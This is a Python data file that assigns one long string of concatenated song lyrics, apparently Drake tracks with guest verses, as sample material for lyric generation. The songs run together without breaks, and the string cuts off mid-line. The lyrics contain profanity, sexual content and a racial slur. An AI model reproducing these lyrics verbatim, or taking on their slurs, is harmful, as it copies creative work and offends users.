encoded_state = [0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0]
output = {
'response':'hi',
'agent_state': (encoded_state, dst_state, 164)
}
a_s = jsonify(output).json()['agent_state']
dst_state = json.dumps(dst_state)
encoded_state = json.dumps(encoded_state)
resp = requests.post('http://localhost:10004', json={'input': 'I want a resturant',
'agent_state': a_s })
def call_gevent(count):
"""调用gevent 模拟高并发"""
begin_time = time.time()
run_gevent_list = []
for i in range(count):
print('--------------%d--Test-------------' % i)
run_gevent_list.append(gevent.spawn(run()))
gevent.joinall(run_gevent_list)
end = time.time()
print('single s:', (end - begin_time) / count)
print('all:', end - begin_time)
call_gevent(10)
| 86.1
| 1,981
| 0.482462
| 1,034
| 4,305
| 1.976789
| 0.105416
| 0.705479
| 1.01272
| 1.289628
| 0.383562
| 0.383562
| 0.383562
| 0.383562
| 0.383562
| 0.381115
| 0
| 0.231217
| 0.202323
| 4,305
| 50
| 1,982
| 86.1
| 0.364007
| 0.003252
| 0
| 0.068182
| 0
| 0
| 0.140666
| 0.008261
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068182
| false
| 0
| 0.295455
| 0
| 0.431818
| 0.068182
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8e316d70de0a7dff7d24ae847e16705fbd3fd438
| 14,004
|
py
|
Python
|
srunner/scenarios/cff_tests.py
|
Soolek/scenario_runner
|
7a50628b50e9458ab2895ce252cf882f55731717
|
[
"MIT"
] | null | null | null |
srunner/scenarios/cff_tests.py
|
Soolek/scenario_runner
|
7a50628b50e9458ab2895ce252cf882f55731717
|
[
"MIT"
] | null | null | null |
srunner/scenarios/cff_tests.py
|
Soolek/scenario_runner
|
7a50628b50e9458ab2895ce252cf882f55731717
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from six.moves.queue import Queue # pylint: disable=relative-import
import math
import py_trees
import carla
from srunner.scenariomanager.carla_data_provider import CarlaDataProvider
from srunner.scenariomanager.scenarioatomics.atomic_behaviors import (ActorTransformSetter,
ActorDestroy,
ActorSource,
ActorSink,
WaypointFollower,
StopVehicle,
ChangeActorTargetSpeed,
KeepVelocity,
DriveAtUntil,
SyncArrival,
Idle)
from srunner.scenariomanager.scenarioatomics.atomic_criteria import CollisionTest, DrivenDistanceTest, MaxVelocityTest
from srunner.scenariomanager.scenarioatomics.atomic_trigger_conditions import DriveDistance, InTriggerDistanceToVehicle
from srunner.scenarios.basic_scenario import BasicScenario
from srunner.tools.scenario_helper import (get_waypoint_in_distance,
get_geometric_linear_intersection)
class CFFNudge(BasicScenario):
def __init__(self, world, ego_vehicles, config, randomize=False, debug_mode=False, criteria_enable=True,
timeout=120):
self._world = world
self._map = CarlaDataProvider.get_map()
self._drivenDistanceM = 140
# Timeout of scenario in seconds
self.timeout = timeout
super(CFFNudge, self).__init__(
"CFFNudge",
ego_vehicles,
config,
world,
debug_mode,
criteria_enable=criteria_enable)
def _initialize_actors(self, config):
# add actors from xml file
for actor in config.other_actors:
vehicle = CarlaDataProvider.request_new_actor(actor.model, actor.transform)
self.other_actors.append(vehicle)
vehicle.set_simulate_physics(enabled=True)
def _create_behavior(self):
sequence = py_trees.composites.Sequence("Sequence Behavior")
# sequence.add_child(Idle())
driveDistance = DriveDistance(
self.ego_vehicles[0],
self._drivenDistanceM,
name="DriveDistance")
# Build behavior tree
sequence.add_child(driveDistance)
return sequence
def _create_test_criteria(self):
criteria = []
collision_criterion = CollisionTest(self.ego_vehicles[0])
driven_distance_criterion = DrivenDistanceTest(self.ego_vehicles[0], self._drivenDistanceM)
criteria.append(collision_criterion)
criteria.append(driven_distance_criterion)
return criteria
def __del__(self):
"""
Remove all actors upon deletion
"""
self.remove_all_actors()
class CFFPeturbation(BasicScenario):
def __init__(self, world, ego_vehicles, config, randomize=False, debug_mode=False, criteria_enable=True,
timeout=120):
self._world = world
self._map = CarlaDataProvider.get_map()
self._drivenDistanceM = 40
# Timeout of scenario in seconds
self.timeout = timeout
super(CFFPeturbation, self).__init__(
"CFFPeturbation",
ego_vehicles,
config,
world,
debug_mode,
criteria_enable=criteria_enable)
def _initialize_actors(self, config):
# add actors from xml file
for actor in config.other_actors:
vehicle = CarlaDataProvider.request_new_actor(actor.model, actor.transform)
self.other_actors.append(vehicle)
vehicle.set_simulate_physics(enabled=True)
def _create_behavior(self):
sequence = py_trees.composites.Sequence("Sequence Behavior")
sequence.add_child(DriveAtUntil(self.ego_vehicles[0], self.other_actors[0], speedMs=4, untilDistance=7))
sequence.add_child(DriveDistance(self.ego_vehicles[0], self._drivenDistanceM))
return sequence
def _create_test_criteria(self):
criteria = []
collision_criterion = CollisionTest(self.ego_vehicles[0])
driven_distance_criterion = DrivenDistanceTest(self.ego_vehicles[0], self._drivenDistanceM)
criteria.append(collision_criterion)
criteria.append(driven_distance_criterion)
return criteria
def __del__(self):
"""
Remove all actors upon deletion
"""
self.remove_all_actors()
class CFFSlowDown(BasicScenario):
def __init__(self, world, ego_vehicles, config, randomize=False, debug_mode=False, criteria_enable=True,
timeout=120):
self._world = world
self._map = CarlaDataProvider.get_map()
self._speed = 8
self._drivenDistanceM = 50
# Timeout of scenario in seconds
self.timeout = timeout
super(CFFSlowDown, self).__init__(
"CFFSlowDown",
ego_vehicles,
config,
world,
debug_mode,
criteria_enable=criteria_enable)
def _initialize_actors(self, config):
# add actors from xml file
for actor in config.other_actors:
vehicle = CarlaDataProvider.request_new_actor(actor.model, actor.transform)
self.other_actors.append(vehicle)
vehicle.set_simulate_physics(enabled=True)
def _create_behavior(self):
l1 = self.config.ego_vehicles[0].transform.location
l2 = self.config.other_actors[0].transform.location
distanceM = math.sqrt((l1.x - l2.x) ** 2 + (l1.y - l2.y) ** 2)
catchupSpeedMs = self._speed + distanceM / 5
sequence = py_trees.composites.Sequence("Sequence Behavior")
parallel = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ONE)
parallel.add_child(DriveAtUntil(self.ego_vehicles[0], self.other_actors[0], speedMs=catchupSpeedMs, untilDistance=7+distanceM/5))
parallel.add_child(WaypointFollower(self.other_actors[0], self._speed, avoid_collision=False))
sequence.add_child(parallel)
parallel = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ONE)
parallel.add_child(DriveDistance(self.ego_vehicles[0], self._drivenDistanceM))
parallel.add_child(WaypointFollower(self.other_actors[0], self._speed, avoid_collision=False))
sequence.add_child(parallel)
return sequence
def _create_test_criteria(self):
criteria = []
collision_criterion = CollisionTest(self.ego_vehicles[0])
driven_distance_criterion = DrivenDistanceTest(self.ego_vehicles[0], self._drivenDistanceM)
criteria.append(collision_criterion)
criteria.append(driven_distance_criterion)
return criteria
def __del__(self):
"""
Remove all actors upon deletion
"""
self.remove_all_actors()
class CFFWang2019_1(BasicScenario):
def __init__(self, world, ego_vehicles, config, randomize=False, debug_mode=False, criteria_enable=True,
timeout=120):
self._world = world
self._map = CarlaDataProvider.get_map()
self._drivenDistanceM = 300
# Timeout of scenario in seconds
self.timeout = timeout
super(CFFWang2019_1, self).__init__(
"CFFWang2019_1",
ego_vehicles,
config,
world,
debug_mode,
criteria_enable=criteria_enable)
def _initialize_actors(self, config):
# add actors from xml file
for actor in config.other_actors:
vehicle = CarlaDataProvider.request_new_actor(actor.model, actor.transform)
self.other_actors.append(vehicle)
vehicle.set_simulate_physics(enabled=True)
def _create_behavior(self):
sequence = py_trees.composites.Sequence("Sequence Behavior")
parallel = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ONE)
parallel.add_child(DriveDistance(self.ego_vehicles[0], self._drivenDistanceM))
parallel.add_child(KeepVelocity(self.other_actors[0], 10))
parallel.add_child(KeepVelocity(self.other_actors[1], 10))
sequence.add_child(parallel)
return sequence
def _create_test_criteria(self):
criteria = []
collision_criterion = CollisionTest(self.ego_vehicles[0])
driven_distance_criterion = DrivenDistanceTest(self.ego_vehicles[0], self._drivenDistanceM)
criteria.append(collision_criterion)
criteria.append(driven_distance_criterion)
return criteria
def __del__(self):
"""
Remove all actors upon deletion
"""
self.remove_all_actors()
class CFFWang2019_2(BasicScenario):
def __init__(self, world, ego_vehicles, config, randomize=False, debug_mode=False, criteria_enable=True,
timeout=120):
self._world = world
self._map = CarlaDataProvider.get_map()
self._drivenDistanceM = 300
# Timeout of scenario in seconds
self.timeout = timeout
super(CFFWang2019_2, self).__init__(
"CFFWang2019_2",
ego_vehicles,
config,
world,
debug_mode,
criteria_enable=criteria_enable)
def _initialize_actors(self, config):
# add actors from xml file
for actor in config.other_actors:
vehicle = CarlaDataProvider.request_new_actor(actor.model, actor.transform)
self.other_actors.append(vehicle)
vehicle.set_simulate_physics(enabled=True)
def _create_behavior(self):
sequence = py_trees.composites.Sequence("Sequence Behavior")
parallel = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ONE)
parallel.add_child(DriveAtUntil(self.ego_vehicles[0], self.other_actors[0], speedMs=8, untilDistance=50))
parallel.add_child(KeepVelocity(self.other_actors[0], 5))
parallel.add_child(KeepVelocity(self.other_actors[1], 7.5))
sequence.add_child(parallel)
parallel = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ONE)
parallel.add_child(DriveDistance(self.ego_vehicles[0], self._drivenDistanceM))
parallel.add_child(WaypointFollower(self.other_actors[0], 10, avoid_collision=True))
parallel.add_child(KeepVelocity(self.other_actors[1], 25))
sequence.add_child(parallel)
return sequence
def _create_test_criteria(self):
criteria = []
collision_criterion = CollisionTest(self.ego_vehicles[0])
driven_distance_criterion = DrivenDistanceTest(self.ego_vehicles[0], self._drivenDistanceM)
criteria.append(collision_criterion)
criteria.append(driven_distance_criterion)
return criteria
def __del__(self):
"""
Remove all actors upon deletion
"""
self.remove_all_actors()
class CFFLim2018(BasicScenario):
def __init__(self, world, ego_vehicles, config, randomize=False, debug_mode=False, criteria_enable=True,
timeout=120):
self._world = world
self._map = CarlaDataProvider.get_map()
self._drivenDistanceM = 80
# Timeout of scenario in seconds
self.timeout = timeout
super(CFFLim2018, self).__init__(
"CFFLim2018",
ego_vehicles,
config,
world,
debug_mode,
criteria_enable=criteria_enable)
self._traffic_light = CarlaDataProvider.get_next_traffic_light(self.ego_vehicles[0], False)
self._traffic_light.set_state(carla.TrafficLightState.Green)
self._traffic_light.set_green_time(timeout)
def _initialize_actors(self, config):
# add actors from xml file
for actor in config.other_actors:
vehicle = CarlaDataProvider.request_new_actor(actor.model, actor.transform)
self.other_actors.append(vehicle)
vehicle.set_simulate_physics(enabled=True)
def _create_behavior(self):
sequence = py_trees.composites.Sequence("Sequence Behavior")
collision_location = get_geometric_linear_intersection(self.ego_vehicles[0], self.other_actors[0])
collision_location.x -= 3
parallel = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ONE)
parallel.add_child(InTriggerDistanceToVehicle(self.ego_vehicles[0],self.other_actors[0], 12))
parallel.add_child(SyncArrival(self.other_actors[0], self.ego_vehicles[0], collision_location))
sequence.add_child(parallel)
parallel = py_trees.composites.Parallel(policy=py_trees.common.ParallelPolicy.SUCCESS_ON_ALL)
parallel.add_child(DriveDistance(self.ego_vehicles[0], self._drivenDistanceM))
parallel.add_child(StopVehicle(self.other_actors[0], 1.0))
sequence.add_child(parallel)
return sequence
def _create_test_criteria(self):
criteria = []
collision_criterion = CollisionTest(self.ego_vehicles[0])
driven_distance_criterion = DrivenDistanceTest(self.ego_vehicles[0], self._drivenDistanceM)
criteria.append(collision_criterion)
criteria.append(driven_distance_criterion)
return criteria
def __del__(self):
"""
Remove all actors upon deletion
"""
self.remove_all_actors()
| 36.563969
| 137
| 0.648672
| 1,432
| 14,004
| 6.046089
| 0.111732
| 0.048279
| 0.036036
| 0.0462
| 0.826865
| 0.807808
| 0.807808
| 0.802264
| 0.77131
| 0.742204
| 0
| 0.014706
| 0.271637
| 14,004
| 382
| 138
| 36.659686
| 0.834118
| 0.044773
| 0
| 0.717647
| 0
| 0
| 0.013915
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.039216
| 0
| 0.227451
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8e3d44218691018b39f7e037e6c414ad0f4efa30
| 37
|
py
|
Python
|
package/sound/formats/waveForamt.py
|
ankitbharti1994/Python
|
86308694cc13910850dc9bd69f6f0d1eaac69bcf
|
[
"Apache-2.0"
] | null | null | null |
package/sound/formats/waveForamt.py
|
ankitbharti1994/Python
|
86308694cc13910850dc9bd69f6f0d1eaac69bcf
|
[
"Apache-2.0"
] | null | null | null |
package/sound/formats/waveForamt.py
|
ankitbharti1994/Python
|
86308694cc13910850dc9bd69f6f0d1eaac69bcf
|
[
"Apache-2.0"
] | null | null | null |
def showType():
return 'Wav Type'
| 18.5
| 21
| 0.648649
| 5
| 37
| 4.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.216216
| 37
| 2
| 21
| 18.5
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
8e46906dca96b55fd8ea724e8d01158bfc9992e5
| 156,848
|
py
|
Python
|
lyric_gen/billie/sample_lyric.py
|
yoonhoelee/bidirectional_LSTM_model_for_lyric_genearation
|
83963f9159e2db6733f8fcc86beb24477811e13e
|
[
"MIT"
] | null | null | null |
lyric_gen/billie/sample_lyric.py
|
yoonhoelee/bidirectional_LSTM_model_for_lyric_genearation
|
83963f9159e2db6733f8fcc86beb24477811e13e
|
[
"MIT"
] | null | null | null |
lyric_gen/billie/sample_lyric.py
|
yoonhoelee/bidirectional_LSTM_model_for_lyric_genearation
|
83963f9159e2db6733f8fcc86beb24477811e13e
|
[
"MIT"
] | null | null | null |
dr10 = ["hey girl do you want my number that way you can call me every time i come into town and then i will drive up to your house and take you out to dinner i dont expect nothin at all but what if we happen to kiss and we touch put a rush on it and get it over with or what if i just know what you like and it feels right then its over with what if i don't call you back prove you right all this lasts just one night maybe we should slow it down slow slow slow hey girl i'm back in atlanta second dates are lovely this time you should choose were we go need suggestions how about the movies mini golf or ice cream i'm not picky you let me know but what if we happen to kiss and we touch put a rush on it and get it over with what if i just know what you like and it feels right then its over with what if i don't call you back prove you right all this lasts just one night maybe we should slow it down slow slow slow but what if we happen to kiss and we touch put a rush on it and get it over with what if i just know what you like and it feels right then its over with what if i don't call you back prove you right all this lasts just one night maybe we should slow it down slow slow slow ayobi yeah yeah yeah i see changes alright bottles on me long as someone drink it never drop the ball fuck are y'all thinking making sure the young money ship is never sinking about to set it off in this bitch jada pinkett i shouldn't have drove tell me how i'm getting home you too fine to be laying down in bed alone i could teach you how to speak my language rosetta stone i swear this life is like the sweetest thing i've ever known about to go thriller mike jackson on these niggas all i need's a fucking red jacket with some zippers super good smidoke a package of the swisher's i did it overnight it couldn't happen any quicker y'all know them well fuck it me neither but point the biggest skeptic out i'll make him a believer it wouldn't be the first time i done it throwing hundreds when i should be throwing ones bitch i changes i see changes one thing 'bout music when it hits you feel no pain and i swear i got this shit that make these bitches go insane so they tell me that they love me i know better than that it's just game it's just what comes with the fame and i'm ready for that i'm just saying but i really can't complain everything is kosher two thumbs up ebert and roeper i really can't see the end getting any closer but i'll probably still be the man when everything is over i see changes so i'm riding through the city with my high beams on can you see me can you see me get your visine on y'all just do not fit the picture turn your widescreen on if you thinking i'ma quit before i die dream on man they treat me like a legend am i really this cold i'm really too young to be feeling this old it's about time you admit it who you kidding man nobody's ever done it like i did it uh i see changes ayobi hook andreena mills i gotta make it out or move quickly can't allow the past to restrict me but this time around they won't skip me i am the last hope don't hesitate not even for a second the hustle has become an obsession i'm on the front line with my weapon i am the last hope kardinal offishall can you imagine the last breath of christ the last breath of christopher wallace on that faithful night the last step that martin luther took as a man i got the power of my world in my hand the microphone brings life or death in the blink of an eye i was born to provoke those born to die i was conceived to beat all odds like las vegas tdot motherfucker watch the world rape us greatest strugglers hustle to succeed cross water smugglers tussle to burn weed it meets that pressure to success in the south niggas watching what i say magnifying my mouth i never take back talk i apply the force hand blistering from many years of holding the torch when the skin rebuilds it grows tougher than leather so we can keep on hold it forever my name's kardinall hook i gotta make it out or move quickly can't allow the past to restrict me but this time around they won't skip me i am the last hope don't hesitate not even for a second the hustle has become an obsession i'm on the front line with my weapon i am the last hope drake jealousy is something i haven't felt in years there's nobody around for me to be jealous of i bet you do a show in my city and no one cheers even if you make the music that ladies and fellas love dawg i'm incredible fuckin unforgettable but when it comes to records i will eat it if it's edible they say the futures always forseen that's why i'm steady getting more money more cream my flow is stuck in the moment that comes before dreams i stay avoiding unlucky like 4 and people get behind and they fight for em' cause he won't let no other niggas write for em' and even when its quite warm the attitude coursing through the veins and my city is an ice storm the name's drake and i don't take it for granted i can take it you offended cause i'm taken advantage man hook i gotta make it out or move quickly can't allow the past to restrict me but this time around they won't skip me i am the last hope don't hesitate not even for a second the hustle has become an obsession i'm on the front line with my weapon i am the last hope drake charlie sloth yeah i been waiting on this one charlie for real i've been waitin' driz i've been waitin' let's get 'em bro nah for real shout out boida too mm i like that let's get 'em driz you don't have a drink you're not drinking or what i got a drink bro hahahaha i like that i got my drink right here cheers my bro toast up man yeah okay yeah drake goldman sachs they wanna hold my racks hedge fund investors talk to adel like he the expert i hear it in they tone when they address him we way too connected tom ford assistant texted asking if i want classic or double breasted i flex with broad shoulders when i walk through the halls they move over stories of how we handle ours start to travel like a lone soldier i told you you hold your girl the same way that i hold composure or hold the wheel of the fuji white rover silverstein dinners all kosher never rushin' my niggas really made somethin' from nothin' dodge sentences like they don't wanna discuss it change subject got the benny yang chains rubbin' never tucked in waiting to inhale things that i own will sell at auction as proof we did well my house museumscale the only skeletons here are the ones from the nights i raised hell make sure the staff are paid well make 'em think twice 'bout the stories that they tell no one knows when the plan is hatchin' i'ma let 'em walk on eggshells tiptoe niggas better know interlude drake charlie sloth wow man like drizzy drake yeah got his foot on your neck man what time is it what time is it it's like two in the morning right now yeah well it's real late over here it's me and charlie that's it you hear me we got the whole building to ourselves we got the building kill them again kill them again driz kill them drake y'all keepin' the score while watchin' me score y'all keep the awards i'll take the rewards if y'all goin' for fun i'll stay and record but if y'all goin' to war i'm there for sure wouldn't miss it i'm living next to michael bobby ralph johnny my neighbors soundin' like new edition that's these guys us guys don't wear new balance or levi's key west retirement plan grippin' the callaway club in my hand hittin' balls off of the balcony into the sand tryna see where they land october firm the new chain of command el chico this is the explanation for the large ego 00 mill' hands free like ronaldinho i go from star to venetian in a small speedboat with girls we know take your pick brooke or tanya both those shorties'd leave their gps on so i can find ya drop location spring break trips i'm in hot rotation i took a lot of my brothers from b and e licks or the pot rotation to ridin' shotgun in a picasso painting tricks up sleeves have 'em playin' innocent to get the shits i need loyalty is priceless to me and this i see before i ever seen this shit tatted on p and tatted on c and tatted on me i speak truth and get to shatterin' dreams so it's best to tiptoe niggas better know yeah drake charlie sloth drizzy drake you're an animal drake you already know that you an animal bruh animal i'm saucy saucy you just stepped out of the club straight into the booth like it's light tear up the ting in one take showed up for you you know what i'm sayin' my brother drizzy my brother you already know wow and you know what it's like you stepped out the club into the booth to prove to everyone why you number one bro why you got your foot on their necks nah for real i stepped in here sn ovo fire in the booth charlie sloth come on the official i rock with the official i'm on official ting you know what it is man come on come on ayy bro it feels like that's another moment there you know what like i got to say this to you on the real bro the way that you've embraced british culture will be remembered forever and the uk love you the real g's over here you know that bro when you go to your parties you see who's in your parties nah you know what it is of course it's the certies nah listen but listen it's a family and it's a big family you know what it is i'm just happy to be home like i said man my brother man foot on neck time yo are these guys dumb you see the big man charlie too oh my goodness my brother drizzy i can hear these rappers' prayers man nah i'm heated for you right now they're like yo please tell drizzy to take his foot off my neck nah i'm heated right now man oh my goodness shout out french montana my brother you know what i'm sayin' the big wave yeah shout out huncho quavo shout out offset blessings on the new ting oh my goodness shout out yo i could go for hours charlie come on man ayy you could go for hours i was at your party the other night i've seen who was there i'm like woah there's a lot of people there was a lot of faces in that party nah i don't wanna hear no chat for the whole 8 about charlie sloth are you dumb alright jheeze jheeze and that right there one take a real moment right there yeah jhee and that's fire in the booth my guy and i'll be back januaryfebruary part two you know what time it is come on okay okay shout out all the g's too man shout out all the artists man everybody from here doin' their thing i'm telling you big inspiration london england come on man come on you know i've applied for your passport right hahaha i need that pre black leather glove no sequins buckles on the jacket it's alyx shit nike crossbody got a piece\u2005in\u2005it got a dance\u2005but it's really on some street\u2005shit i'ma show you how to get it it go right foot up left foot slide left foot up right foot slide basically i'm sayin' either way we 'bout to slide ayy can't let this one slide ayy post don't you wanna dance with me no i could dance like michael jackson i could give you thug passion it's a thriller in the trap where we from baby don't you wanna dance with me no i could dance like michael jackson i could give you satisfaction and you know we out here every day with it i'ma show you how to get it it go right foot up left foot slide left foot up right foot slide basically i'm sayin' either way we 'bout to slide ayy can't let this one slide ayy who's bad two thousand shorties wanna tie the knot ayy yeah two hundred shooters on my brother's block woah yeah petal off a rose like i love her not maybe not i don't know what's wrong with me i can't stop woah yeah won't stop woah yeah never stop got so many opps i be mistakin' opps for other opps got so many people that i love out of troubled spots other than the family i got it's either you or me that's just how i think it's either you or me this life got too deep for you baby two or three of us about to creep where they stayin' pre black leather glove no sequins buckles on the jacket it's alyx shit nike crossbody got a piece in it got a dance but it's really on some street shit i'ma show you how to get it it go right foot up left foot slide left foot up right foot slide basically i'm sayin' either way we 'bout to slide ayy can't let this one slide ayy who's bad toosie slide then i hit it doubletime then i hit a spin 'cause we spun their block a couple times if it's not the right time there'll always be another time i'm not even trippin' we'll just see 'em in the summertime woah yeah can't describe the pressure i be puttin' on myself yeah really i just can't afford to lose nobody else yeah if they movin' shaky we'll just do this shit ourselves woah if i'm movin' shaky chubbs'll do this shit himself yeah niggas only yolo for real heard a lot about you but we don't know for real next time guarantee the truth'll get revealed pre black leather gloves no sequins yeah buckles on the jacket it's alyx shit nike crossbody got a piece in it got a dance but it's really on some street shit i'ma show you how it go right foot up left foot slide left foot up right foot slide basically i'm sayin' either way we 'bout to slide ayy can't let this one slide ayy post don't you wanna dance with me no i could dance like michael jackson jackson i could give you thug passion passion it's a thriller in the trap where we from where we from baby don't you wanna dance with me no i could dance like michael jackson jackson i could give you satisfaction 'faction and you know we out here every day with it i'ma show you how to get it it go right foot up left foot slide left foot up right foot slide basically i'm sayin' either way we 'bout to slide who's bad drake yeah nicki minaj young money yeah drizzy's home baby pre drake baby you my everything you all i ever wanted we can do it real big bigger than you ever done it you be up on everything other hoes ain't never on it i want this forever i swear i could spend whatever on it 'cause she hold me down every time i hit her up when i get right i promise that we gon' live it up she make me beg for it 'til she give it up and i say the same thing every single time drake nicki minaj i say you the fucking best ayy you the fucking best ayy you the fucking best ayy you the fucking best ayy you the best i ever had best i ever best i ever had best i ever best i ever had best i ever best i ever had best i ever i say you the fucking drake trey songz know you got a roommate call me when its no one there put the key under the mat and you know i'll be over there yup i'll be over there shawty i'll be over there i'll be hitting all the spots that u ain't even know was there ha and you ain't even have to ask twice you can have my heart or we can share it like the last slice always felt like you was so accustomed to the fast life have a nigga thinking that he met you in a past life sweatpants hair tied chilling with no makeup on that's when you're the prettiest i hope that you don't take it wrong you don't even trip when friends say you ain't bringin' drake along you know that i'm working i'll be there soon as i make it home and she a patient in my waiting room never pay attention to them rumors and what they assume and until them girls prove it i'm the one to never get confused with 'cause pre drake baby you my everything you all i ever wanted we can do it real big bigger than you ever done it you be up on everything other hoes ain't never on it i want this forever i swear i could spend whatever on it 'cause she hold me down every time i hit her up when i get right i promise that we gon' live it up she make me beg for it 'til she give it up and i say the same thing every single time drake nicki minaj i say you the fucking best ayy you the fucking best ayy you the fucking best ayy you the fucking best ayy you the best i ever had best i ever best i ever had best i ever best i ever had best i ever best i ever had best i ever i say you the fucking nicki minaj ayo you the only one that see the real nicki i can show you chill nicki 'cause of how you deal wit me when they knock my blocks down you come and you build with me even though you real busy you still fuckin' real drizzy it's so amazing i figured out this world is ours with the taking i figured out that when i go out and all those people scream that's some of them are living vicariously through me that's why i put that s on my chest and i'm gone but on another note let's have sex in my dorm and i'ma make you beg 'cause you look pretty when you beggin' so meet me on the campus i'll be there around eleven so let me put my books down down excuse me if i look down down guess i'm a little nervous but i'm at your service look at what you took down down pre nicki minaj baby you my everything you all i ever wanted we can do it real big bigger then you ever done it you be up on everything other niggas never on it i want this forever i swear i can spend whatever on it that's why i hold you down every time you hit me up when i get right i promise that we gon' live it up i make you beg for it until i give it up you say the same thing every single time drake nicki minaj i say you the fucking best ayy you the fucking best ayy you the fucking best ayy you the fucking best ayy you the best i ever had best i ever best i ever had best i ever best i ever had best i ever best i ever had best i ever i say you the fucking drake sex love pain baby i be on that tank shit buzz so big i could probably sell a blank disc when my album drop bitches'll buy it for the picture and niggas will buy it too and claim they got it for they sister magazine paper girl but money ain't the issue they bring dinner to my room and ask me to initial she call me the referee 'cause i be so official my shirt ain't got no stripes but i can make your pussy whistle like the andy 